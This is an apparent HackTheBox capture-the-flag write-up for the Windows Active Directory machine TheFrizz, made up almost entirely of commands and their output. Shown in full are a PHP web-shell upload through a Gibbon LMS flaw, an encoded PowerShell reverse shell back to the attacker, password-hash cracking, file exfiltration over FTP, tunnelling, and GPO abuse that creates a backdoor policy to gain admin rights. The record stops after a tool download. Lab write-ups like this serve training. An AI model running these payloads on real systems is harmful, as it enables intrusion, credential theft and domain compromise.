WriteupsHTB — TheFrizz
ADMediumWindows
HTB — TheFrizz
Active Directory machine exploiting misconfigured LAPS and ACL abuse chain to escalate from low-privileged user to Domain Admin.
March 18, 2025HackTheBox
#AD#LAPS#ACL Abuse#BloodHound
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 17:13 EDT
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 17:16 (0:00:13 remaining)
Nmap scan report for 10.10.11.60
Host is up (0.092s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-19 04:16:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
55596/tcp open msrpc Microsoft Windows RPC
55600/tcp open msrpc Microsoft Windows RPC
55610/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m39s
| smb2-time:
| date: 2025-03-19T04:16:59
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 195.15 ms 10.10.14.1
2 195.24 ms 10.10.11.60
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.27 seconds
80/tcp
sh
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
LFI Gibbon v25.0.0
- https://github.com/maddsec/CVE-2023-34598
Gibbon RCE Upload
- https://www.reddit.com/r/netsec/comments/17zjtmj/cve202345878_vulnerability_in_gibbon_edu_leads_to/?rdt=35877
sh
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
- powershell reverse shell using reverse shell generator
sh
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwACIALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAsh
rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.60] 50462
whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS>88
sh
/opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d frizz.htb --dc 10.10.11.60 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 03/18/25 - Ronnie Flathers @ropnop
2025/03/18 17:31:50 > Using KDC(s):
2025/03/18 17:31:50 > 10.10.11.60:88
2025/03/18 17:31:56 > [+] VALID USERNAME: administrator@frizz.htb
2025/03/18 17:32:27 > [+] VALID USERNAME: Administrator@frizz.htb445/tcp open microsoft-ds?
sh
smbclient -N -L \\\\10.10.11.60
session setup failed: NT_STATUS_NOT_SUPPORTEDconfig.php
sh
PS C:\xampp\htdocs\Gibbon-LMS> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs\Gibbon-LMS> cat config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';creds
MrGibbonsDB:MisterGibbs!Parrot!?1
users
sh
PS C:\xampp\htdocs\Gibbon-LMS> net user
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
The command completed successfully.txt
a.perlstein
c.sandiego
g.frizzle
J.perlstein
l.awesome
p.terese
v.frizzle
Administrator
d.hudson
k.franklin
m.ramon
r.tennelli
w.li
c.ramon
f.frizzle
h.arm
M.SchoolBus
t.wright
w.Webservicechisel
sh
Invoke-WebRequest http://10.10.14.10/chisel.exe -OutFile chisele.exesh
./chisel server --reverse --port 1234
./chisel.exe client 10.10.14.10:1234 R:3306:127.0.0.1:3306sh
PS C:\xampp\htdocs\Gibbon-LMS> ./chisel.exe client 10.10.14.10:1234 R:3306:127.0.0.1:3306mysql
sh
mysql -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' -h 127.0.0.1
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 97
Server version: 10.4.32-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| gibbon |
| information_schema |
| test |
+--------------------+
3 rows in set (0.024 sec)sh
MariaDB [test]> use gibbonsh
MariaDB [gibbon]> show tables;
+---------------------------------------+
| Tables_in_gibbon |
+---------------------------------------+
| gibbonaction |
| gibbonactivity |
| gibbonactivityattendance |
| gibbonactivityslot |
| gibbonactivitystaff |
| gibbonactivitystudent |
| gibbonactivitytype |
| gibbonadmissionsaccount |
| gibbonadmissionsapplication |
| gibbonalarm |
| gibbonalarmconfirm |
| gibbonalertlevel |
| gibbonapplicationform |
| gibbonapplicationformfile |
| gibbonapplicationformlink |
| gibbonapplicationformrelationship |
| gibbonattendancecode |
| gibbonattendancelogcourseclass |
| gibbonattendancelogformgroup |
| gibbonattendancelogperson |
| gibbonbehaviour |
| gibbonbehaviourletter |
| gibboncountry |
| gibboncourse |
| gibboncourseclass |
| gibboncourseclassmap |
| gibboncourseclassperson |
| gibboncrowdassessdiscuss |
| gibboncustomfield |
| gibbondataretention |
| gibbondaysofweek |
| gibbondepartment |
| gibbondepartmentresource |
| gibbondepartmentstaff |
| gibbondiscussion |
| gibbondistrict |
| gibbonemailtemplate |
| gibbonexternalassessment |
| gibbonexternalassessmentfield |
| gibbonexternalassessmentstudent |
| gibbonexternalassessmentstudententry |
| gibbonfamily |
| gibbonfamilyadult |
| gibbonfamilychild |
| gibbonfamilyrelationship |
| gibbonfamilyupdate |
| gibbonfileextension |
| gibbonfinancebillingschedule |
| gibbonfinancebudget |
| gibbonfinancebudgetcycle |
| gibbonfinancebudgetcycleallocation |
| gibbonfinancebudgetperson |
| gibbonfinanceexpense |
| gibbonfinanceexpenseapprover |
| gibbonfinanceexpenselog |
| gibbonfinancefee |
| gibbonfinancefeecategory |
| gibbonfinanceinvoice |
| gibbonfinanceinvoicee |
| gibbonfinanceinvoiceeupdate |
| gibbonfinanceinvoicefee |
| gibbonfirstaid |
| gibbonfirstaidfollowup |
| gibbonform |
| gibbonformfield |
| gibbonformgroup |
| gibbonformpage |
| gibbonformsubmission |
| gibbonformupload |
| gibbongroup |
| gibbongroupperson |
| gibbonhook |
| gibbonhouse |
| gibboni18n |
| gibbonin |
| gibboninarchive |
| gibboninassistant |
| gibbonindescriptor |
| gibbonininvestigation |
| gibbonininvestigationcontribution |
| gibboninpersondescriptor |
| gibboninternalassessmentcolumn |
| gibboninternalassessmententry |
| gibbonlanguage |
| gibbonlibraryitem |
| gibbonlibraryitemevent |
| gibbonlibrarytype |
| gibbonlog |
| gibbonmarkbookcolumn |
| gibbonmarkbookentry |
| gibbonmarkbooktarget |
| gibbonmarkbookweight |
| gibbonmedicalcondition |
| gibbonmessenger |
| gibbonmessengercannedresponse |
| gibbonmessengerreceipt |
| gibbonmessengertarget |
| gibbonmigration |
| gibbonmodule |
| gibbonnotification |
| gibbonnotificationevent |
| gibbonnotificationlistener |
| gibbonoutcome |
| gibbonpayment |
| gibbonpermission |
| gibbonperson |
| gibbonpersonaldocument |
| gibbonpersonaldocumenttype |
| gibbonpersonmedical |
| gibbonpersonmedicalcondition |
| gibbonpersonmedicalconditionupdate |
| gibbonpersonmedicalupdate |
| gibbonpersonreset |
| gibbonpersonstatuslog |
| gibbonpersonupdate |
| gibbonplannerentry |
| gibbonplannerentrydiscuss |
| gibbonplannerentryguest |
| gibbonplannerentryhomework |
| gibbonplannerentryoutcome |
| gibbonplannerentrystudenthomework |
| gibbonplannerentrystudenttracker |
| gibbonplannerparentweeklyemailsummary |
| gibbonreport |
| gibbonreportarchive |
| gibbonreportarchiveentry |
| gibbonreportingaccess |
| gibbonreportingcriteria |
| gibbonreportingcriteriatype |
| gibbonreportingcycle |
| gibbonreportingprogress |
| gibbonreportingproof |
| gibbonreportingscope |
| gibbonreportingvalue |
| gibbonreportprototypesection |
| gibbonreporttemplate |
| gibbonreporttemplatefont |
| gibbonreporttemplatesection |
| gibbonresource |
| gibbonresourcetag |
| gibbonrole |
| gibbonrubric |
| gibbonrubriccell |
| gibbonrubriccolumn |
| gibbonrubricentry |
| gibbonrubricrow |
| gibbonscale |
| gibbonscalegrade |
| gibbonschoolyear |
| gibbonschoolyearspecialday |
| gibbonschoolyearterm |
| gibbonsession |
| gibbonsetting |
| gibbonspace |
| gibbonspaceperson |
| gibbonstaff |
| gibbonstaffabsence |
| gibbonstaffabsencedate |
| gibbonstaffabsencetype |
| gibbonstaffapplicationform |
| gibbonstaffapplicationformfile |
| gibbonstaffcontract |
| gibbonstaffcoverage |
| gibbonstaffcoveragedate |
| gibbonstaffduty |
| gibbonstaffdutyperson |
| gibbonstaffjobopening |
| gibbonstaffupdate |
| gibbonstring |
| gibbonstudentenrolment |
| gibbonstudentnote |
| gibbonstudentnotecategory |
| gibbonsubstitute |
| gibbontheme |
| gibbontt |
| gibbonttcolumn |
| gibbonttcolumnrow |
| gibbonttday |
| gibbonttdaydate |
| gibbonttdayrowclass |
| gibbonttdayrowclassexception |
| gibbonttimport |
| gibbonttspacebooking |
| gibbonttspacechange |
| gibbonunit |
| gibbonunitblock |
| gibbonunitclass |
| gibbonunitclassblock |
| gibbonunitoutcome |
| gibbonusernameformat |
| gibbonyeargroup |
+---------------------------------------+
191 rows in set (0.051 sec)sh
MariaDB [gibbon]> select * from gibbonperson;
+----------------+-------+---------+-----------+---------------+---------------+------------------+-------------+-----------+------------------------------------------------------------------+------------------------+--------------------+--------+----------+---------------------+-----------------+------+---------------------+----------------+-----------+---------------+---------------------+-------------------+-------------------+-----------+----------+------------------+-----------------+----------+------------------+-----------------+------------+-------------------+--------+------------+-------------------+--------+------------+-------------------+--------+------------+-------------------+--------+---------+---------------+----------------+---------------+----------------+----------------------+-----------+----------+------------+----------+----------+----------------+-------------------+-------------------+------------------------+----------------+-------------------+-------------------+------------------------+---------------+-----------+-----------+---------+---------------------------+------------+------------+-----------------+-----------+----------------+----------------------+--------------------+----------------------+--------------------------+-------------------------+--------------+---------------------+--------------------+-------------------+---------+---------+-----------------------+----------------------+-------------------+-----------------------+--------------------------+------------------------+---------------------------+-----------+----------+---------------+--------+
| gibbonPersonID | title | surname | firstName | preferredName | officialName | nameInCharacters | gender | username | passwordStrong | passwordStrongSalt | passwordForceReset | status | canLogin | gibbonRoleIDPrimary | gibbonRoleIDAll | dob | email | emailAlternate | image_240 | lastIPAddress | lastTimestamp | lastFailIPAddress | lastFailTimestamp | failCount | address1 | address1District | address1Country | address2 | address2District | address2Country | phone1Type | phone1CountryCode | phone1 | phone3Type | phone3CountryCode | phone3 | phone2Type | phone2CountryCode | phone2 | phone4Type | phone4CountryCode | phone4 | website | languageFirst | languageSecond | languageThird | countryOfBirth | birthCertificateScan | ethnicity | religion | profession | employer | jobTitle | emergency1Name | emergency1Number1 | emergency1Number2 | emergency1Relationship | emergency2Name | emergency2Number1 | emergency2Number2 | emergency2Relationship | gibbonHouseID | studentID | dateStart | dateEnd | gibbonSchoolYearIDClassOf | lastSchool | nextSchool | departureReason | transport | transportNotes | calendarFeedPersonal | viewCalendarSchool | viewCalendarPersonal | viewCalendarSpaceBooking | gibbonApplicationFormID | lockerNumber | vehicleRegistration | personalBackground | messengerLastRead | privacy | dayType | gibbonThemeIDPersonal | gibboni18nIDPersonal | studentAgreements | googleAPIRefreshToken | microsoftAPIRefreshToken | genericAPIRefreshToken | receiveNotificationEmails | mfaSecret | mfaToken | cookieConsent | fields |
+----------------+-------+---------+-----------+---------------+---------------+------------------+-------------+-----------+------------------------------------------------------------------+------------------------+--------------------+--------+----------+---------------------+-----------------+------+---------------------+----------------+-----------+---------------+---------------------+-------------------+-------------------+-----------+----------+------------------+-----------------+----------+------------------+-----------------+------------+-------------------+--------+------------+-------------------+--------+------------+-------------------+--------+------------+-------------------+--------+---------+---------------+----------------+---------------+----------------+----------------------+-----------+----------+------------+----------+----------+----------------+-------------------+-------------------+------------------------+----------------+-------------------+-------------------+------------------------+---------------+-----------+-----------+---------+---------------------------+------------+------------+-----------------+-----------+----------------+----------------------+--------------------+----------------------+--------------------------+-------------------------+--------------+---------------------+--------------------+-------------------+---------+---------+-----------------------+----------------------+-------------------+-----------------------+--------------------------+------------------------+---------------------------+-----------+----------+---------------+--------+
| 0000000001 | Ms. | Frizzle | Fiona | Fiona | Fiona Frizzle | | Unspecified | f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 | N | Full | Y | 001 | 001 | NULL | f.frizzle@frizz.htb | NULL | NULL | ::1 | 2024-10-29 09:28:59 | NULL hashcat
sh
hashcat -m 1420 -a 0 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489 /usr/share/wordlists/rockyou.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23creds
f.frizzle:Jenni_Luvs_Magic23
getTGT
sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/f.frizzle:'Jenni_Luvs_Magic23' -dc-ip 10.10.11.60
[2] 63633
2025-03-20 01:01:07.067136 (-0400) +25204.355720 +/- 0.013230 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25204.355720
[2] - done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccachesh
export KRB5CCNAME=/home/sake/htb-labs/TheFrizz/f.frizzle.ccacheadd this to /etc/krb5.conf
sh
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_kdc = false
[realms]
FRIZZ.HTB = {
kdc = 10.10.11.60
admin_server = 10.10.11.60
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTBsh
ntpdate 10.10.11.60ssh
sh
ssh f.frizzle@frizz.htbsh
PS C:\Users\f.frizzle> whoami
frizz\f.frizzleuser.txt
sh
PS C:\Users\f.frizzle\Desktop> cat user.txt
d48608f2...sh
PS C:\Users> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
v.frizzle
The command completed successfully.sh
PS C:\Users\f.frizzle\Documents> Invoke-WebRequest http://10.10.14.10/SharpHound.exe -OutFile SharpHound.exesh
.\SharpHound.exe -c All --zipfilename frizz.htbgroup policy
sh
PS C:\Users\f.frizzle\Documents> Get-DomainGPO | select displayname
displayname
-----------
Default Domain Policy
Default Domain Controllers Policysh
python3 -m pyftpdlib -p 21 -wsh
(New-Object Net.WebClient).UploadFile('ftp://10.10.14.10/20250320134617_frizz.htb.zip', 'C:\Users\f.frizzle\Documents\20250320134617_frizz.htb.zip')bloodhound
domain admins
hidden folder
sh
PS C:\> ls -Force | Where-Object { $_.Attributes -match "Hidden" }
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM $RECYCLE.BIN
d--h- 3/10/2025 3:31 PM $WinREAgent
d--hs 2/20/2025 2:51 PM Config.Msi
l--hs 10/29/2024 9:12 AM Documents and Settings -> C:\Users
d--h- 2/20/2025 2:50 PM ProgramData
d--hs 10/29/2024 9:12 AM Recovery
d--hs 10/29/2024 7:25 AM System Volume Information
-a-hs 10/29/2024 8:27 AM 12288 DumpStack.log.tmpsh
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> copy '$RE2XMEG.7z' C:\Users\f.frizzle\Documents\recycle.7z
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> copy '$IE2XMEG.7z' C:\Users\f.frizzle\Documents\recycle2.7z- traansfer to own kali
sh
python3 -m pyftpdlib -p 21 -wsh
(New-Object Net.WebClient).UploadFile('ftp://10.10.14.10/recycle.7z', 'C:\Users\f.frizzle\Documents\recycle.7z')sh
(New-Object Net.WebClient).UploadFile('ftp://10.10.14.10/recycle2.7z', 'C:\Users\f.frizzle\Documents\recycle2.7z')sh
7z x recycle.7zsh
cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\logcreds
sh
echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R- potential users
cmd
PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 3/11/2025 3:37 PM Administrator
d---- 10/29/2024 7:27 AM f.frizzle
d---- 10/29/2024 7:31 AM M.SchoolBus
d-r-- 10/29/2024 7:13 AM Public
d---- 2/19/2025 1:35 PM v.frizzle
d---- 2/19/2025 1:35 PM w.Webservice
- using the
impacket-getTGTmethod to test if credential works
sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' -dc-ip 10.10.11.60
[3] 454915
2025-03-20 18:31:24.109874 (-0400) +25204.756353 +/- 0.009193 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25204.756353
[3] done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccache- using another user will failed
sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/v.frizzle:'!suBcig@MehTed!R' -dc-ip 10.10.11.60
[3] 460039
2025-03-20 18:35:37.642330 (-0400) -0.001326 +/- 0.009005 10.10.11.60 s1 no-leap
[3] done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)sh
export KRB5CCNAME=/home/sake/htb-labs/TheFrizz/M.SchoolBus.ccachesh
ntpdate 10.10.11.60sh
ssh M.SchoolBus@frizz.htbsh
PS C:\Users\M.SchoolBus> whoami
frizz\m.schoolbus
PS C:\Users\M.SchoolBus> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabledsh
PS C:\Users\M.SchoolBus> whoami /all
USER INFORMATION
----------------
User Name SID
================= ==============================================
frizz\m.schoolbus S-1-5-21-2386970044-1145388522-2932701813-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
frizz\Desktop Admins Group S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
frizz\Group Policy Creator Owners Group S-1-5-21-2386970044-1145388522-2932701813-520 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192sh
Invoke-WebRequest http://10.10.14.10/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exesh
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "DEFAULT DOMAIN POLICY"sh
Invoke-WebRequest http://10.10.14.10/PowerView.ps1 -OutFile PowerView.ps1sh
Set-ExecutionPolicy Bypass -Scope Processsh
Import-Module .\PowerView.ps1sh
PS C:\Users\M.SchoolBus\Documents> Get-DomainGPO | select displayname
displayname
-----------
Default Domain Policy
Default Domain Controllers Policysh
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "Default Domain Policy"sh
PS C:\Users\M.SchoolBus\Documents> New-GPO -Name "BackdoorPolicy"
DisplayName : BackdoorPolicy
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 4213b0e0-c3dd-46f2-9c92-15855fee19ac
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/20/2025 4:06:55 PM
ModificationTime : 3/20/2025 4:06:55 PM
UserVersion :
ComputerVersion :
WmiFilter : sh
New-GPLink -Name "BackdoorPolicy" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
GpoId : 5ee86fda-fbe8-4bd6-8347-9d939ff84492
DisplayName : BackdoorPolicy
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2sh
PS C:\Users\M.SchoolBus\Documents> Get-GPO -Name "BackdoorPolicy"
DisplayName : BackdoorPolicy
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 5ee86fda-fbe8-4bd6-8347-9d939ff84492
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/20/2025 4:07:57 PM
ModificationTime : 3/20/2025 4:07:56 PM
UserVersion :
ComputerVersion :
WmiFilter : sh
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "BackdoorPolicy"sh
PS C:\Users\M.SchoolBus\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "BackdoorPolicy"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "BackdoorPolicy" is: {5EE86FDA-FBE8-4BD6-8347-9D939FF84492}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{5EE86FDA-FBE8-4BD6-8347-9D939FF84492}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!sh
gpupdate /forcesh
PS C:\Users\M.SchoolBus\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
M.SchoolBus
The command completed successfully.sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' -dc-ip 10.10.11.60
[1] 483551
2025-03-20 19:12:41.170807 (-0400) +25204.804481 +/- 0.009566 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25204.804481
[1] + done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccachesh
export KRB5CCNAME=/home/sake/htb-labs/TheFrizz/M.SchoolBus.ccachesh
Invoke-WebRequest http://10.10.14.10/RunasCs.exe -OutFile RunasCs.exesh
